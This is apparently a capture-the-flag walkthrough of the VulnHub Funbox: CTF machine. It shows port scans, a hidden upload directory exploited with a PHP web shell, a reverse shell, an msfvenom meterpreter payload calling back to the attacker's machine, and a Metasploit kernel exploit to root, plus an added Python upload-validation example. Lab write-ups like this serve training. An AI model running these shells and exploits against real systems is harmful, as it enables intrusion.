Funbox 4 Target Machine Information

Name: Funbox: CTF

URL:

https://www.vulnhub.com/entry/funbox-ctf,546/

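Identifying the Target's IP Address

Import the target VM into VirtualBox and set its network adapter to host-only mode. Start Kali Linux and the target.

The built-in netdiscover tool identifies the target's IP address as 192.168.56.150.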

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor
192.168.56.100  08:00:27:4e:f4:34      1      60  PCS Systemtechnik GmbH
192.168.56.150  08:00:27:4e:a2:f4      1      60  PCS Systemtechnik GmbH

NMAP Scan

Run a full port scan with NMAP:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.150 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-06 02:45 EDT
Nmap scan report for bogon (192.168.56.150)
Host is up (0.00024s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f6:b3:8f:f1:e3:b7:6c:18:ee:31:22:d3:d4:c9:5f:e6 (RSA)
|   256 45:c2:16:fc:3e:a9:fc:32:fc:36:fb:d7:ce:4f:2b:fe (ECDSA)
|_  256 4f:f8:46:72:22:9f:d3:10:51:9c:49:e0:76:5f:25:33 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: PIPELINING AUTH-RESP-CODE UIDL TOP SASL CAPA RESP-CODES
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: have SASL-IR capabilities LOGIN-REFERRALS IDLE ENABLE post-login OK LITERAL+ Pre-login listed ID more LOGINDISABLEDA0001 IMAP4rev1
MAC Address: 08:00:27:4E:A2:F4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.70 seconds

The NMAP scan shows that the target host has 4 open ports:

22 (ssh), 80 (http), 110 (pop3), 143 (imap)

Getting a Shell

└─$ nikto -h http://192.168.56.150
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.150
+ Target Hostname:    192.168.56.150
+ Target Port:        80
+ Start Time:         2023-05-06 02:46:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2c39, size: 5ae05b2177aa4, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2023-05-06 02:47:07 (GMT-4) (56 seconds)
---------------------------------------------------------------------------

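The author actually gave a hint: on this target, nikto's checks are case-sensitive. Although the /robots.txt file does not exist, we can test whether the uppercase ROBOTS.TXT does.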

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ curl http://192.168.56.150/ROBOTS.TXT
Disallow: upload/
Disallow: igmseklhgmrjmtherij2145236

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ curl http://192.168.56.150/igmseklhgmrjmtherij2145236/
403 Forbidden

Forbidden

You don't have permission to access /igmseklhgmrjmtherij2145236/
on this server.

Apache/2.4.18 (Ubuntu) Server at 192.168.56.150 Port 80

However, requesting igmseklhgmrjmtherij2145236 returns a Forbidden response, so the directory may contain subdirectories or files. Continue scanning with gobuster.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gobuster dir -u http://192.168.56.150/igmseklhgmrjmtherij2145236/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.bak,.js,.txt,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.150/igmseklhgmrjmtherij2145236/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,bak,js,txt,sh
[+] Timeout:                 10s
===============================================================
2023/05/06 03:04:36 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 321]
/.php                 (Status: 403) [Size: 320]
/upload.html          (Status: 200) [Size: 297]
/upload               (Status: 301) [Size: 344] [--> http://192.168.56.150/igmseklhgmrjmtherij2145236/upload/]
/upload.php           (Status: 200) [Size: 319]
Progress: 11663 / 1543927 (0.76%)^C
[!] Keyboard interrupt detected, terminating.

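The scan found the /upload subdirectory and the upload.php file under that directory. The latter lets us upload files and applies no filtering at all, so the next step is to upload shell.php. But where is the file stored? Given the /upload subdirectory, it is probably placed there, and requesting it confirms this: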

http://192.168.56.150/igmseklhgmrjmtherij2145236/upload/shell.php

The reverse shell from the target host is successfully received on Kali Linux.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.150] 48272
Linux funbox4 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 09:08:17 up 26 min,  0 users,  load average: 1.13, 1.81, 2.70
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@funbox4:/$ cd /home
cd /home
www-data@funbox4:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  4 root   root   4.0K Aug 29  2020 .
drwxr-xr-x 23 root   root   4.0K May  6 09:07 ..
drwx------  4 anna   anna   4.0K Aug 30  2020 anna
drwxr-xr-x  4 thomas thomas 4.0K Aug 30  2020 thomas
www-data@funbox4:/home$ cd anna
cd anna
bash: cd: anna: Permission denied
www-data@funbox4:/home$ cd thomas
cd thomas
www-data@funbox4:/home/thomas$ ls -alh
ls -alh
total 3.0M
drwxr-xr-x 4 thomas thomas 4.0K Aug 30  2020 .
drwxr-xr-x 4 root   root   4.0K Aug 29  2020 ..
-rw------- 1 thomas thomas   46 Aug 30  2020 .bash_history
-rw-r--r-- 1 thomas thomas  220 Aug 29  2020 .bash_logout
-rw-r--r-- 1 thomas thomas 3.7K Aug 29  2020 .bashrc
drwx------ 2 thomas thomas 4.0K Aug 29  2020 .cache
-rw-r--r-- 1 thomas thomas  675 Aug 29  2020 .profile
drwx------ 2 thomas thomas 4.0K Aug 30  2020 .ssh
-rw-r--r-- 1 thomas thomas  195 Aug 29  2020 .todo
-rw------- 1 thomas thomas 1.3K Aug 30  2020 .viminfo
-rw-rw-r-- 1 thomas thomas  217 Aug 30  2020 .wget-hsts
-rwx------ 1 thomas thomas 3.0M Aug 22  2019 pspy64
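
The upload.php form above accepted shell.php with no filtering, and the same form is used later on this page for an ELF payload. The following is an added example, not code from the original write-up or from the target: it shows the server-side checks that were missing and an audit of files already sitting in an upload directory. The image-only allowlist, the function names and the sample file contents are assumptions constructed for illustration.

```python
import os
import tempfile

# Assumed policy for an image-only upload form: extension -> required magic bytes.
ALLOWED = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff", ".gif": b"GIF8"}
# Leading bytes that identify executable content regardless of the file name.
EXEC_PREFIXES = {b"\x7fELF": "ELF binary", b"#!": "script with shebang"}

def inspect_upload(filename, data):
    """Return the reasons to reject an upload; an empty list means accept."""
    reasons = []
    ext = os.path.splitext(os.path.basename(filename).lower())[1]
    if ext not in ALLOWED:
        reasons.append("extension %s not on allowlist" % (ext or "(none)"))
    elif not data.startswith(ALLOWED[ext]):
        reasons.append("content does not match %s signature" % ext)
    reasons += [label for prefix, label in EXEC_PREFIXES.items() if data.startswith(prefix)]
    # A PHP open tag anywhere matters: a valid image header can precede it.
    if b"<?php" in data.lower():
        reasons.append("embedded PHP open tag")
    return reasons

def audit_upload_dir(path):
    """Re-check files already stored in an upload directory."""
    findings = {}
    for entry in sorted(os.listdir(path)):
        full = os.path.join(path, entry)
        if os.path.isfile(full):
            with open(full, "rb") as fh:
                reasons = inspect_upload(entry, fh.read())
            if reasons:
                findings[entry] = reasons
    return findings

def demo():
    samples = {  # constructed stand-ins, not the files from the write-up
        "shell.php": b"<?php /* placeholder body */ ?>",
        "escalate.elf": b"\x7fELF" + b"\x00" * 12,
        "avatar.jpg": b"\xff\xd8\xff\xe0" + b"<?php /* placeholder */ ?>",
        "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in samples.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(body)
        return audit_upload_dir(tmp)

if __name__ == "__main__":
    print(demo())
```

Content checks like these are a second layer: the primary control is to store uploads outside the web root, or in a directory where the web server does not execute scripts, under server-generated file names.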

Privilege Escalation

www-data@funbox4:/$ cat hint.txt
cat hint.txt
The OS beard ist whiter and longer as Gandalfs one !
Perhaps, its possible to get root from here. 
I doesnt look forward to see this in the writeups/walktroughs, 
but this is murpys law !

Now, rockyou.txt isnt your friend. Its a little sed harder :-)

If you need more brainfuck: Take this:
++++++++++[>+>+++>+++++++>++++++++++<<<>>++++++++++++++.>++++.---.<>+++++++++.---------.+++++++++++++++++++.----.<>------------.+.+++++.++++++.<>-----------.++++++++++.<>-------.+++.------------.--.+++++++++++++++++++.---------------.-.<>+++++.+++++.<<++++++++++++++++++++++++++.

Bit more ?
Tm8gaGludHMgaGVyZSAhCg==

Not enough ?
KNSWC4TDNAQGM33SEB2G6ZDPOMXA====

Decode the message above (brainfuck) with the following site:

https://www.splitbrain.org/services/ook

Decoding gives:

The next hint is located in:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ echo 'Tm8gaGludHMgaGVyZSAhCg==' | base64 -d
No hints here !

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ echo 'KNSWC4TDNAQGM33SEB2G6ZDPOMXA====' | base32 -d
Search for todos.

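Although these all decode successfully, they are of no real value; they are traps the author left on purpose. The next step is to upgrade the existing shell to meterpreter. What is unusual about this target is that it has no wget, curl or similar tools, so the upload.php page can be used to upload the file: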

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ msfvenom -p  linux/x86/meterpreter/reverse_tcp  LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf

Upload the escalate.elf payload to the /tmp directory on the target host and change its permissions.

www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236$ cd upload
cd upload
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ ls -alh
ls -alh
total 20K
drwxrwxrwx 2 root     root     4.0K May  6 09:25 .
drwxr-xr-x 3 root     root     4.0K Aug 29  2020 ..
-rw-r--r-- 1 www-data www-data  207 May  6 09:25 escalate.elf
-rw-r--r-- 1 www-data www-data 5.4K May  6 09:07 shell.php
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ mv escalate.elf /tmp
<tml/igmseklhgmrjmtherij2145236/upload$ mv escalate.elf /tmp
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ cd /tmp
cd /tmp
www-data@funbox4:/tmp$ chmod +x escalate.elf
chmod +x escalate.elf
www-data@funbox4:/tmp$ 

At the same time, start a handler on Kali Linux and wait for the connection from the target host.

msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set LhOST 192.168.56.230
LhOST => 192.168.56.230
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.230:6666 

Execute the payload in the target host's shell, then use the suggester module to find a suitable privilege-escalation module.

msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(multi/handler) > use  post/multi/recon/local_exploit_suggester 
msf6 post(multi/recon/local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.56.150 - Collecting local exploits for x86/linux...
[*] 192.168.56.150 - 167 exploit checks are being tried...
[+] 192.168.56.150 - exploit/linux/local/bpf_priv_esc: The target appears to be vulnerable.
[+] 192.168.56.150 - exploit/linux/local/bpf_sign_extension_priv_esc: The target appears to be vulnerable.
[+] 192.168.56.150 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.150 - exploit/linux/local/glibc_realpath_priv_esc: The target appears to be vulnerable.
[+] 192.168.56.150 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.150 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
[*] 192.168.56.150 - Valid modules for session 1:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/bpf_priv_esc                                   Yes                      The target appears to be vulnerable.
 2   exploit/linux/local/bpf_sign_extension_priv_esc                    Yes                      The target appears to be vulnerable.
 3   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.
 4   exploit/linux/local/glibc_realpath_priv_esc                        Yes                      The target appears to be vulnerable.
 5   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.
 6   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.

msf6 post(multi/recon/local_exploit_suggester) >  use exploit/linux/local/bpf_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/bpf_priv_esc) > show options 

Module options (exploit/linux/local/bpf_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
   MAXWAIT  120              yes       Max time to wait for decrementation in seconds
   SESSION                   yes       The session to run this module on


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux x64


msf6 exploit(linux/local/bpf_priv_esc) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/bpf_priv_esc) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/bpf_priv_esc) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/bpf_priv_esc) > run

[*] Started reverse TCP handler on 192.168.56.230:8888 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[-] libfuse-dev is not installed.  Compiling will fail.
[*] Writing '/tmp/hello' (9576 bytes) ...
[*] Writing '/tmp/doubleput' (13920 bytes) ...
[*] Writing '/tmp/suidhelper' (25792 bytes) ...
[*] Writing '/tmp/.dSu6XHZTXdNaEU' (282 bytes) ...
[*] Launching exploit. This may take up to 120 seconds.
[!] This module adds a job to /etc/crontab which requires manual removal!
[+] Success! set-uid root /tmp/suidhelper
[*] Sending stage (3020772 bytes) to 192.168.56.150
[+] Deleted /tmp/hello
[+] Deleted /tmp/doubleput
[+] Deleted /tmp/.dSu6XHZTXdNaEU
[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.150:53458) at 2023-05-06 03:36:04 -0400

meterpreter > shell
Process 10780 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -alh
total 36K
drwx------  3 root root 4.0K Aug 30  2020 .
drwxr-xr-x 23 root root 4.0K May  6 09:07 ..
-rw-------  1 root root 1.9K Aug 30  2020 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
drwx------  2 root root 4.0K Aug 30  2020 .cache
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root 6.4K Aug 30  2020 .viminfo
-rw-r--r--  1 root root  430 Aug 29  2020 flag.txt
cat flag.txt
(  _`\              ( )                       (  _`\(_   _)(  _`\ 
| (_(_)_   _   ___  | |_      _          _    | ( (_) | |  | (_(_)
|  _) ( ) ( )/' _ `\| '_`\  /'_`\ (`\/')(_)   | |  _  | |  |  _)  
| |   | (_) || ( ) || |_) )( (_) ) >  <  _    | (_( ) | |  | |    
(_)   `\___/'(_) (_)(_,__/'`\___/'(_/\_)(_)   (____/' (_)  (_)    

Well done ! Made with ❤ by @0815R2d2 ! I look forward to see this screenshot on twitter ;-)

STRIVE FOR PROGRESS, NOT FOR PERFECTION